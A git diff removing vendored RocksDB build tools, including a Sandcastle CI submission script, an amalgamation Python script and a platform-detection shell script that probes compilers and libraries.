-      "report" => array($send_email_template),
-      "steps" => getSteps($applyDiff, $diffID, $username, $test)
-    );
-  }
-
-  // We cannot submit the parallel execution master plan to Sandcastle and
-  // need supply the job plan as a determinator. So we construct a small job
-  // that will spit out the master job plan which Sandcastle will parse and
-  // execute. Why compress the job definitions? Otherwise we run over the max
-  // string size.
-  $cmd = "echo " . base64_encode(json_encode($arg))
-         . (PHP_OS == "Darwin" ?
-             " | gzip -f | base64" :
-                 " | gzip -f | base64 -w0");
-  assert(strlen($cmd) > 0);
-
-  $arg_encoded = shell_exec($cmd);
-  assert(strlen($arg_encoded) > 0);
-
-  $runName = "Run diff " . $diffID . "for user " . $username;
-
-  if (!$applyDiff) {
-    $runName = "RocksDB continuous integration build and test run";
-  }
-
-  $command = array(
-    "name" => $runName,
-    "steps" => array()
-  );
-
-  $command["steps"][] = array(
-    "name" => "Generate determinator",
-    "shell" => "echo " . $arg_encoded . " | base64 --decode | gzip -d"
-               . " | base64 --decode",
-    "determinator" => true,
-    "user" => "root"
-  );
-
-  // Submit to Sandcastle.
-  $url = 'https://interngraph.intern.facebook.com/sandcastle/create';
-
-  $job = array(
-    'command' => 'SandcastleUniversalCommand',
-    'args' => $command,
-    'capabilities' => array(
-      'vcs' => 'rocksdb-int-git',
-      'type' => 'lego',
-    ),
-    'hash' => 'origin/master',
-    'user' => $username,
-    'alias' => 'rocksdb-precommit',
-    'tags' => array('rocksdb'),
-    'description' => 'Rocksdb precommit job',
-  );
-
-  // Fetch the configuration necessary to submit a successful HTTPS request.
-  $sandcastle_config = getSandcastleConfig();
-
-  $app = $sandcastle_config[0];
-  $token = $sandcastle_config[1];
-
-  $cmd = 'curl -s -k '
-          . ' -F app=' . escapeshellarg($app)
-          . ' -F token=' . escapeshellarg($token)
-          . ' -F job=' . escapeshellarg(json_encode($job))
-          .' ' . escapeshellarg($url);
-
-  $output = shell_exec($cmd);
-  assert(strlen($output) > 0);
-
-  // Extract Sandcastle URL from the response.
-  preg_match('/url": "(.+)"/', $output, $sandcastle_url);
-
-  assert(count($sandcastle_url) > 0, "Unable to submit Sandcastle request.");
-  assert(strlen($sandcastle_url[1]) > 0, "Unable to extract Sandcastle URL.");
-
-  if ($applyDiff) {
-    echo "\nSandcastle URL: " . $sandcastle_url[1] . "\n";
-    // Ask Phabricator to display it on the diff UI.
-    postURL($diffID, $sandcastle_url[1]);
-  } else {
-    echo "Continuous integration started Sandcastle tests. You can look at ";
-    echo "the progress at:\n" . $sandcastle_url[1] . "\n";
-  }
-}
-
-// Continuous run cript will set the environment variable and based on that
-// we'll trigger the execution of tests in Sandcastle. In that case we don't
-// need to apply any diffs and there's no associated workflow either.
-if (getenv(ENV_POST_RECEIVE_HOOK)) {
-  startTestsInSandcastle(
-    false /* $applyDiff */,
-    NULL /* $workflow */,
-    NULL /* $diffID */);
-}
diff --git a/thirdparty/rocksdb/build_tools/amalgamate.py b/thirdparty/rocksdb/build_tools/amalgamate.py
deleted file mode 100755
index 548b1e8..0000000
--- a/thirdparty/rocksdb/build_tools/amalgamate.py
+++ /dev/null
@@ -1,110 +0,0 @@
-#!/usr/bin/python
-
-# amalgamate.py creates an amalgamation from a unity build.
-# It can be run with either Python 2 or 3.
-# An amalgamation consists of a header that includes the contents of all public
-# headers and a source file that includes the contents of all source files and
-# private headers.
-#
-# This script works by starting with the unity build file and recursively expanding
-# #include directives. If the #include is found in a public include directory,
-# that header is expanded into the amalgamation header.
-#
-# A particular header is only expanded once, so this script will
-# break if there are multiple inclusions of the same header that are expected to
-# expand differently. Similarly, this type of code causes issues:
-#
-# #ifdef FOO
-#   #include "bar.h"
-#   // code here
-# #else
-#   #include "bar.h"            // oops, doesn't get expanded
-#   // different code here
-# #endif
-#
-# The solution is to move the include out of the #ifdef.
-
-from __future__ import print_function
-
-import argparse
-from os import path
-import re
-import sys
-
-include_re = re.compile('^[ \t]*#include[ \t]+"(.*)"[ \t]*$')
-included = set()
-excluded = set()
-
-def find_header(name, abs_path, include_paths):
-    samedir = path.join(path.dirname(abs_path), name)
-    if path.exists(samedir):
-        return samedir
-    for include_path in include_paths:
-        include_path = path.join(include_path, name)
-        if path.exists(include_path):
-            return include_path
-    return None
-
-def expand_include(include_path, f, abs_path, source_out, header_out, include_paths, public_include_paths):
-    if include_path in included:
-        return False
-
-    included.add(include_path)
-    with open(include_path) as f:
-        print('#line 1 "{}"'.format(include_path), file=source_out)
-        process_file(f, include_path, source_out, header_out, include_paths, public_include_paths)
-    return True
-
-def process_file(f, abs_path, source_out, header_out, include_paths, public_include_paths):
-    for (line, text) in enumerate(f):
-        m = include_re.match(text)
-        if m:
-            filename = m.groups()[0]
-            # first check private headers
-            include_path = find_header(filename, abs_path, include_paths)
-            if include_path:
-                if include_path in excluded:
-                    source_out.write(text)
-                    expanded = False
-                else:
-                    expanded = expand_include(include_path, f, abs_path, source_out, header_out, include_paths, public_include_paths)
-            else:
-                # now try public headers
-                include_path = find_header(filename, abs_path, public_include_paths)
-                if include_path:
-                    # found public header
-                    expanded = False
-                    if include_path in excluded:
-                        source_out.write(text)
-                    else:
-                        expand_include(include_path, f, abs_path, header_out, None, public_include_paths, [])
-                else:
-                    sys.exit("unable to find {}, included in {} on line {}".format(filename, abs_path, line))
-
-            if expanded:
-                print('#line {} "{}"'.format(line+1, abs_path), file=source_out)
-        elif text != "#pragma once\n":
-            source_out.write(text)
-
-def main():
-    parser = argparse.ArgumentParser(description="Transform a unity build into an amalgamation")
-    parser.add_argument("source", help="source file")
-    parser.add_argument("-I", action="append", dest="include_paths", help="include paths for private headers")
-    parser.add_argument("-i", action="append", dest="public_include_paths", help="include paths for public headers")
-    parser.add_argument("-x", action="append", dest="excluded", help="excluded header files")
-    parser.add_argument("-o", dest="source_out", help="output C++ file", required=True)
-    parser.add_argument("-H", dest="header_out", help="output C++ header file", required=True)
-    args = parser.parse_args()
-
-    include_paths = list(map(path.abspath, args.include_paths or []))
-    public_include_paths = list(map(path.abspath, args.public_include_paths or []))
-    excluded.update(map(path.abspath, args.excluded or []))
-    filename = args.source
-    abs_path = path.abspath(filename)
-    with open(filename) as f, open(args.source_out, 'w') as source_out, open(args.header_out, 'w') as header_out:
-        print('#line 1 "{}"'.format(filename), file=source_out)
-        print('#include "{}"'.format(header_out.name), file=source_out)
-        process_file(f, abs_path, source_out, header_out, include_paths, public_include_paths)
-
-if __name__ == "__main__":
-    main()
diff --git a/thirdparty/rocksdb/build_tools/build_detect_platform b/thirdparty/rocksdb/build_tools/build_detect_platform
deleted file mode 100755
index c7ddb7c..0000000
--- a/thirdparty/rocksdb/build_tools/build_detect_platform
+++ /dev/null
@@ -1,532 +0,0 @@
-#!/bin/sh
-#
-# Detects OS we're compiling on and outputs a file specified by the first
-# argument, which in turn gets read while processing Makefile.
-#
-# The output will set the following variables:
-#   CC                          C Compiler path
-#   CXX                         C++ Compiler path
-#   PLATFORM_LDFLAGS            Linker flags
-#   JAVA_LDFLAGS                Linker flags for RocksDBJava
-#   JAVA_STATIC_LDFLAGS         Linker flags for RocksDBJava static build
-#   PLATFORM_SHARED_EXT         Extension for shared libraries
-#   PLATFORM_SHARED_LDFLAGS     Flags for building shared library
-#   PLATFORM_SHARED_CFLAGS      Flags for compiling objects for shared library
-#   PLATFORM_CCFLAGS            C compiler flags
-#   PLATFORM_CXXFLAGS           C++ compiler flags.  Will contain:
-#   PLATFORM_SHARED_VERSIONED   Set to 'true' if platform supports versioned
-#                               shared libraries, empty otherwise.
-#
-# The PLATFORM_CCFLAGS and PLATFORM_CXXFLAGS might include the following:
-#
-#       -DROCKSDB_PLATFORM_POSIX    if posix-platform based
-#       -DSNAPPY                    if the Snappy library is present
-#       -DLZ4                       if the LZ4 library is present
-#       -DZSTD                      if the ZSTD library is present
-#       -DNUMA                      if the NUMA library is present
-#       -DTBB                       if the TBB library is present
-#
-# Using gflags in rocksdb:
-# Our project depends on gflags, which requires users to take some extra steps
-# before they can compile the whole repository:
-#   1. Install gflags. You may download it from here:
-#      https://gflags.github.io/gflags/ (Mac users can `brew install gflags`)
-#   2. Once installed, add the include path for gflags to your CPATH env var and
-#      the lib path to LIBRARY_PATH. If installed with default settings, the lib
-#      will be /usr/local/lib and the include path will be /usr/local/include
-
-OUTPUT=$1
-if test -z "$OUTPUT"; then
-  echo "usage: $0 <output-filename>" >&2
-  exit 1
-fi
-
-# we depend on C++11
-PLATFORM_CXXFLAGS="-std=c++11"
-# we currently depend on POSIX platform
-COMMON_FLAGS="-DROCKSDB_PLATFORM_POSIX -DROCKSDB_LIB_IO_POSIX"
-
-# Default to fbcode gcc on internal fb machines
-if [ -z "$ROCKSDB_NO_FBCODE" -a -d /mnt/gvfs/third-party ]; then
-    FBCODE_BUILD="true"
-    # If we're compiling with TSAN we need pic build
-    PIC_BUILD=$COMPILE_WITH_TSAN
-    if [ -z "$ROCKSDB_FBCODE_BUILD_WITH_481" ]; then
-      source "$PWD/build_tools/fbcode_config.sh"
-    else
-      # we need this to build with MySQL. Don't use for other purposes.
-      source "$PWD/build_tools/fbcode_config4.8.1.sh"
-    fi
-fi
-
-# Delete existing output, if it exists
-rm -f "$OUTPUT"
-touch "$OUTPUT"
-
-if test -z "$CC"; then
-   CC=cc
-fi
-
-if test -z "$CXX"; then
-    CXX=g++
-fi
-
-# Detect OS
-if test -z "$TARGET_OS"; then
-    TARGET_OS=`uname -s`
-fi
-
-if test -z "$TARGET_ARCHITECTURE"; then
-    TARGET_ARCHITECTURE=`uname -m`
-fi
-
-if test -z "$CLANG_SCAN_BUILD"; then
-    CLANG_SCAN_BUILD=scan-build
-fi
-
-if test -z "$CLANG_ANALYZER"; then
-    CLANG_ANALYZER=$(which clang++ 2> /dev/null)
-fi
-
-COMMON_FLAGS="$COMMON_FLAGS ${CFLAGS}"
-CROSS_COMPILE=
-PLATFORM_CCFLAGS=
-PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS"
-PLATFORM_SHARED_EXT="so"
-PLATFORM_SHARED_LDFLAGS="-Wl,--no-as-needed -shared -Wl,-soname -Wl,"
-PLATFORM_SHARED_CFLAGS="-fPIC"
-PLATFORM_SHARED_VERSIONED=true
-
-# generic port files (working on all platform by #ifdef) go directly in /port
-GENERIC_PORT_FILES=`cd "$ROCKSDB_ROOT"; find port -name '*.cc' | tr "\n" " "`
-
-# On GCC, we pick libc's memcmp over GCC's memcmp via -fno-builtin-memcmp
-case "$TARGET_OS" in
-    Darwin)
-        PLATFORM=OS_MACOSX
-        COMMON_FLAGS="$COMMON_FLAGS -DOS_MACOSX"
-        PLATFORM_SHARED_EXT=dylib
-        PLATFORM_SHARED_LDFLAGS="-dynamiclib -install_name "
-        # PORT_FILES=port/darwin/darwin_specific.cc
-        ;;
-    IOS)
-        PLATFORM=IOS
-        COMMON_FLAGS="$COMMON_FLAGS -DOS_MACOSX -DIOS_CROSS_COMPILE -DROCKSDB_LITE"
-        PLATFORM_SHARED_EXT=dylib
-        PLATFORM_SHARED_LDFLAGS="-dynamiclib -install_name "
-        CROSS_COMPILE=true
-        PLATFORM_SHARED_VERSIONED=
-        ;;
-    Linux)
-        PLATFORM=OS_LINUX
-        COMMON_FLAGS="$COMMON_FLAGS -DOS_LINUX"
-        if [ -z "$USE_CLANG" ]; then
-            COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp"
-        fi
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread -lrt"
-        # PORT_FILES=port/linux/linux_specific.cc
-        ;;
-    SunOS)
-        PLATFORM=OS_SOLARIS
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_SOLARIS -m64"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread -lrt -static-libstdc++ -static-libgcc -m64"
-        # PORT_FILES=port/sunos/sunos_specific.cc
-        ;;
-    AIX)
-        PLATFORM=OS_AIX
-        CC=gcc
-        COMMON_FLAGS="$COMMON_FLAGS -maix64 -pthread -fno-builtin-memcmp -D_REENTRANT -DOS_AIX -D__STDC_FORMAT_MACROS"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -pthread -lpthread -lrt -maix64 -static-libstdc++ -static-libgcc"
-        # PORT_FILES=port/aix/aix_specific.cc
-        ;;
-    FreeBSD)
-        PLATFORM=OS_FREEBSD
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_FREEBSD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread"
-        # PORT_FILES=port/freebsd/freebsd_specific.cc
-        ;;
-    NetBSD)
-        PLATFORM=OS_NETBSD
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_NETBSD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread -lgcc_s"
-        # PORT_FILES=port/netbsd/netbsd_specific.cc
-        ;;
-    OpenBSD)
-        PLATFORM=OS_OPENBSD
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_OPENBSD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -pthread"
-        # PORT_FILES=port/openbsd/openbsd_specific.cc
-        ;;
-    DragonFly)
-        PLATFORM=OS_DRAGONFLYBSD
-        COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_DRAGONFLYBSD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread"
-        # PORT_FILES=port/dragonfly/dragonfly_specific.cc
-        ;;
-    Cygwin)
-        PLATFORM=CYGWIN
-        PLATFORM_SHARED_CFLAGS=""
-        PLATFORM_CXXFLAGS="-std=gnu++11"
-        COMMON_FLAGS="$COMMON_FLAGS -DCYGWIN"
-        if [ -z "$USE_CLANG" ]; then
-            COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp"
-        fi
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lpthread -lrt"
-        # PORT_FILES=port/linux/linux_specific.cc
-        ;;
-    OS_ANDROID_CROSSCOMPILE)
-        PLATFORM=OS_ANDROID
-	COMMON_FLAGS="$COMMON_FLAGS -fno-builtin-memcmp -D_REENTRANT -DOS_ANDROID -DROCKSDB_PLATFORM_POSIX"
-	PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS "  # All pthread features are in the Android C library
-        # PORT_FILES=port/android/android.cc
-        CROSS_COMPILE=true
-        ;;
-    *)
-        echo "Unknown platform!" >&2
-        exit 1
-esac
-
-PLATFORM_CXXFLAGS="$PLATFORM_CXXFLAGS ${CXXFLAGS}"
-JAVA_LDFLAGS="$PLATFORM_LDFLAGS"
-JAVA_STATIC_LDFLAGS="$PLATFORM_LDFLAGS"
-
-if [ "$CROSS_COMPILE" = "true" -o "$FBCODE_BUILD" = "true" ]; then
-    # Cross-compiling; do not try any compilation tests.
-    # Also don't need any compilation tests if compiling on fbcode
-    true
-else
-    if ! test $ROCKSDB_DISABLE_FALLOCATE; then
-        # Test whether fallocate is available
-        $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-          #include <fcntl.h>
-          #include <linux/falloc.h>
-          int main() {
-      int fd = open("/dev/null", 0);
-      fallocate(fd, FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE, 0, 1024);
-          }
-EOF
-        if [ "$?" = 0 ]; then
-            COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_FALLOCATE_PRESENT"
-        fi
-    fi
-
-    # Test whether Snappy library is installed
-    # http://code.google.com/p/snappy/
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <snappy.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DSNAPPY"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lsnappy"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lsnappy"
-    fi
-
-    # Test whether gflags library is installed
-    # http://gflags.github.io/gflags/
-    # check if the namespace is gflags
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null << EOF
-      #include <gflags/gflags.h>
-      using namespace gflags;
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DGFLAGS=gflags"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lgflags"
-    else
-      # check if namespace is google
-      $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null << EOF
-        #include <gflags/gflags.h>
-        using namespace google;
-        int main() {}
-EOF
-      if [ "$?" = 0 ]; then
-          COMMON_FLAGS="$COMMON_FLAGS -DGFLAGS=google"
-          PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lgflags"
-      fi
-    fi
-
-    # Test whether zlib library is installed
-    $CXX $CFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <zlib.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DZLIB"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lz"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lz"
-    fi
-
-    # Test whether bzip library is installed
-    $CXX $CFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <bzlib.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DBZIP2"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lbz2"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lbz2"
-    fi
-
-    # Test whether lz4 library is installed
-    $CXX $CFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <lz4.h>
-      #include <lz4hc.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DLZ4"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -llz4"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -llz4"
-    fi
-
-    # Test whether zstd library is installed
-    $CXX $CFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <zstd.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DZSTD"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lzstd"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lzstd"
-    fi
-
-    # Test whether numa is available
-    $CXX $CFLAGS -x c++ - -o /dev/null -lnuma 2>/dev/null  <<EOF
-      #include <numa.h>
-      #include <numaif.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DNUMA"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lnuma"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -lnuma"
-    fi
-
-    # Test whether tbb is available
-    $CXX $CFLAGS $LDFLAGS -x c++ - -o /dev/null -ltbb 2>/dev/null  <<EOF
-      #include <tbb/tbb.h>
-      int main() {}
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DTBB"
-        PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -ltbb"
-        JAVA_LDFLAGS="$JAVA_LDFLAGS -ltbb"
-    fi
-
-    # Test whether jemalloc is available
-    if echo 'int main() {}' | $CXX $CFLAGS -x c++ - -o /dev/null -ljemalloc \
-      2>/dev/null; then
-        # This will enable some preprocessor identifiers in the Makefile
-        JEMALLOC=1
-        # JEMALLOC can be enabled either using the flag (like here) or by
-        # providing direct link to the jemalloc library
-        WITH_JEMALLOC_FLAG=1
-    else
-        # jemalloc is not available. Let's try tcmalloc
-        if echo 'int main() {}' | $CXX $CFLAGS -x c++ - -o /dev/null \
-          -ltcmalloc 2>/dev/null; then
-            PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -ltcmalloc"
-            JAVA_LDFLAGS="$JAVA_LDFLAGS -ltcmalloc"
-        fi
-    fi
-
-    # Test whether malloc_usable_size is available
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <malloc.h>
-      int main() {
-        size_t res = malloc_usable_size(0);
-        return 0;
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_MALLOC_USABLE_SIZE"
-    fi
-
-    # Test whether PTHREAD_MUTEX_ADAPTIVE_NP mutex type is available
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <pthread.h>
-      int main() {
-        int x = PTHREAD_MUTEX_ADAPTIVE_NP;
-        return 0;
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_PTHREAD_ADAPTIVE_MUTEX"
-    fi
-
-    # Test whether backtrace is available
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <execinfo.h>>
-      int main() {
-        void* frames[1];
-        backtrace_symbols(frames, backtrace(frames, 1));
-        return 0;
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_BACKTRACE"
-    else
-        # Test whether execinfo library is installed
-        $CXX $CFLAGS -lexecinfo -x c++ - -o /dev/null 2>/dev/null  <<EOF
-          #include <execinfo.h>
-          int main() {
-            void* frames[1];
-            backtrace_symbols(frames, backtrace(frames, 1));
-          }
-EOF
-        if [ "$?" = 0 ]; then
-            COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_BACKTRACE"
-            PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -lexecinfo"
-            JAVA_LDFLAGS="$JAVA_LDFLAGS -lexecinfo"
-        fi
-    fi
-
-    # Test if -pg is supported
-    $CXX $CFLAGS -pg -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      int main() {
-        return 0;
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        PROFILING_FLAGS=-pg
-    fi
-
-    # Test whether sync_file_range is supported for compatibility with an old glibc
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <fcntl.h>
-      int main() {
-        int fd = open("/dev/null", 0);
-        sync_file_range(fd, 0, 1024, SYNC_FILE_RANGE_WRITE);
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_RANGESYNC_PRESENT"
-    fi
-
-    # Test whether sched_getcpu is supported
-    $CXX $CFLAGS -x c++ - -o /dev/null 2>/dev/null  <<EOF
-      #include <sched.h>
-      int main() {
-        int cpuid = sched_getcpu();
-      }
-EOF
-    if [ "$?" = 0 ]; then
-        COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_SCHED_GETCPU_PRESENT"
-    fi
-fi
-
-# TODO(tec): Fix -Wshorten-64-to-32 errors on FreeBSD and enable the warning.
-# -Wshorten-64-to-32 breaks compilation on FreeBSD i386
-if ! [ "$TARGET_OS" = FreeBSD -a "$TARGET_ARCHITECTURE" = i386 ]; then
-  # Test whether -Wshorten-64-to-32 is available
-  $CXX $CFLAGS -x c++ - -o /dev/null -Wshorten-64-to-32 2>/dev/null  <<EOF
-    int main() {}
-EOF
-  if [ "$?" = 0 ]; then
-    COMMON_FLAGS="$COMMON_FLAGS -Wshorten-64-to-32"
-  fi
-fi
-
-# shall we use HDFS?
-
-if test "$USE_HDFS"; then
-  if test -z "$JAVA_HOME"; then
-    echo "JAVA_HOME has to be set for HDFS usage."
-    exit 1
-  fi
-  HDFS_CCFLAGS="$HDFS_CCFLAGS -I$JAVA_HOME/include -I$JAVA_HOME/include/linux -DUSE_HDFS"
-  HDFS_LDFLAGS="$HDFS_LDFLAGS -lhdfs -L$JAVA_HOME/jre/lib/amd64"
-  HDFS_LDFLAGS="$HDFS_LDFLAGS -L$JAVA_HOME/jre/lib/amd64/server -L$GLIBC_RUNTIME_PATH/lib"
-  HDFS_LDFLAGS="$HDFS_LDFLAGS -ldl -lverify -ljava -ljvm"
-  COMMON_FLAGS="$COMMON_FLAGS $HDFS_CCFLAGS"
-  PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS $HDFS_LDFLAGS"
-  JAVA_LDFLAGS="$JAVA_LDFLAGS $HDFS_LDFLAGS"
-fi
-
-if test "$USE_SSE"; then
-  COMMON_FLAGS="$COMMON_FLAGS -msse4.2"
-elif test -z "$PORTABLE"; then
-  if test -n "`echo $TARGET_ARCHITECTURE | grep ^ppc64`"; then
-    # Tune for this POWER processor, treating '+' models as base models
-    POWER=`LD_SHOW_AUXV=1 /bin/true | grep AT_PLATFORM | grep -E -o power[0-9]+`
-    COMMON_FLAGS="$COMMON_FLAGS -mcpu=$POWER -mtune=$POWER "
-  elif test -n "`echo $TARGET_ARCHITECTURE | grep ^s390x`"; then
-    COMMON_FLAGS="$COMMON_FLAGS -march=z10 "
-  elif [ "$TARGET_OS" != AIX ] && [ "$TARGET_OS" != SunOS ]; then
-    COMMON_FLAGS="$COMMON_FLAGS -march=native "
-  fi
-fi
-
-$CXX $PLATFORM_CXXFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null <<EOF
-  #include <cstdint>
-  #include <nmmintrin.h>
-  int main() {
-    volatile uint32_t x = _mm_crc32_u32(0, 0);
-  }
-EOF
-if [ "$?" = 0 ]; then
-  COMMON_FLAGS="$COMMON_FLAGS -DHAVE_SSE42"
-elif test "$USE_SSE"; then
-  echo "warning: USE_SSE specified but compiler could not use SSE intrinsics, disabling"
-fi
-
-# iOS doesn't support thread-local storage, but this check would erroneously
-# succeed because the cross-compiler flags are added by the Makefile, not this
-# script.
-if [ "$PLATFORM" != IOS ]; then
-  $CXX $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null <<EOF
-  #if defined(_MSC_VER) && !defined(__thread)
-  #define __thread __declspec(thread)
-  #endif
-  int main() {
-    static __thread int tls;
-  }
-EOF
-  if [ "$?" = 0 ]; then
-    COMMON_FLAGS="$COMMON_FLAGS -DROCKSDB_SUPPORT_THREAD_LOCAL"
-  fi
-fi
-
-PLATFORM_CCFLAGS="$PLATFORM_CCFLAGS $COMMON_FLAGS"
-PLATFORM_CXXFLAGS="$PLATFORM_CXXFLAGS $COMMON_FLAGS"
-
-VALGRIND_VER="$VALGRIND_VER"
-
-ROCKSDB_MAJOR=`build_tools/version.sh major`
-ROCKSDB_MINOR=`build_tools/version.sh minor`
-ROCKSDB_PATCH=`build_tools/version.sh patch`
-
-echo "CC=$CC" >> "$OUTPUT"
-echo "CXX=$CXX" >> "$OUTPUT"
-echo "PLATFORM=$PLATFORM" >> "$OUTPUT"
-echo "PLATFORM_LDFLAGS=$PLATFORM_LDFLAGS" >> "$OUTPUT"
-echo "JAVA_LDFLAGS=$JAVA_LDFLAGS" >> "$OUTPUT"
-echo "JAVA_STATIC_LDFLAGS=$JAVA_STATIC_LDFLAGS" >> "$OUTPUT"
-echo "VALGRIND_VER=$VALGRIND_VER" >> "$OUTPUT"
-echo "PLATFORM_CCFLAGS=$PLATFORM_CCFLAGS" >> "$OUTPUT"
-echo "PLATFORM_CXXFLAGS=$PLATFORM_CXXFLAGS" >> "$OUTPUT"
-echo "PLATFORM_SHARED_CFLAGS=$PLATFORM_SHARED_CFLAGS" >> "$OUTPUT"
-echo "PLATFORM_SHARED_EXT=$PLATFORM_SHARED_EXT" >> "$OUTPUT"
-echo "PLATFORM_SHARED_LDFLAGS=$PLATFORM_SHARED_LDFLAGS" >> "$OUTPUT"
-echo "PLATFORM_SHARED_VERSIONED=$PLATFORM_SHARED_VERSIONED" >> "$OUTPUT"
-echo "EXEC_LDFLAGS=$EXEC_LDFLAGS" >> "$OUTPUT"
-echo "JEMALLOC_INCLUDE=$JEMALLOC_INCLUDE" >> "$OUTPUT"
-echo "JEMALLOC_LIB=$JEMALLOC_LIB" >> "$OUTPUT"
-echo "ROCKSDB_MAJOR=$ROCKSDB_MAJOR" >> "$OUTPUT"
-echo "ROCKSDB_MINOR=$ROCKSDB_MINOR" >> "$OUTPUT"
-echo "ROCKSDB_PATCH=$ROCKSDB_PATCH" >> "$OUTPUT"
-echo "CLANG_SCAN_BUILD=$CLANG_SCAN_BUILD" >> "$OUTPUT"
-echo "CLANG_ANALYZER=$CLANG_ANALYZER" >> "$OUTPUT"
-echo "PROFILING_FLAGS=$PROFILING_FLAGS" >> "$OUTPUT"
-# This will enable some related identifiers for the preprocessor
-if test -n "$JEMALLOC"; then
-  echo "JEMALLOC=1" >> "$OUTPUT"
-fi
-# Indicates that jemalloc should be enabled using -ljemalloc flag
-# The alternative is to porvide a direct link to the library via JEMALLOC_LIB
-# and JEMALLOC_INCLUDE
-if test -n "$WITH_JEMALLOC_FLAG"; then
-  echo "WITH_JEMALLOC_FLAG=$WITH_JEMALLOC_FLAG" >> "$OUTPUT"
-fi
-echo "LUA_PATH=$LUA_PATH" >> "$OUTPUT"
diff --git a/thirdparty/rocksdb/build_tools/cont_integration.sh b/thirdparty/rocksdb/build_tools/cont_integration.sh
deleted file mode 100755
index 06f25c5..0000000
--- a/thirdparty/rocksdb/build_tools/cont_integration.sh
+++ /dev/null
@@ -1,135 +0,0 @@
-#!/usr/bin/env bash
-#
-# Copyright (c) 2016, Facebook. All rights reserved.
-#
-# Overall wrapper script for RocksDB continuous builds. The implementation is a
-# trivial pulling scheme. We loop infinitely, check if any new changes have been
-# committed, if yes then trigger a Sandcastle run, and finally go to sleep again
-# for a certain interval.
-#
-
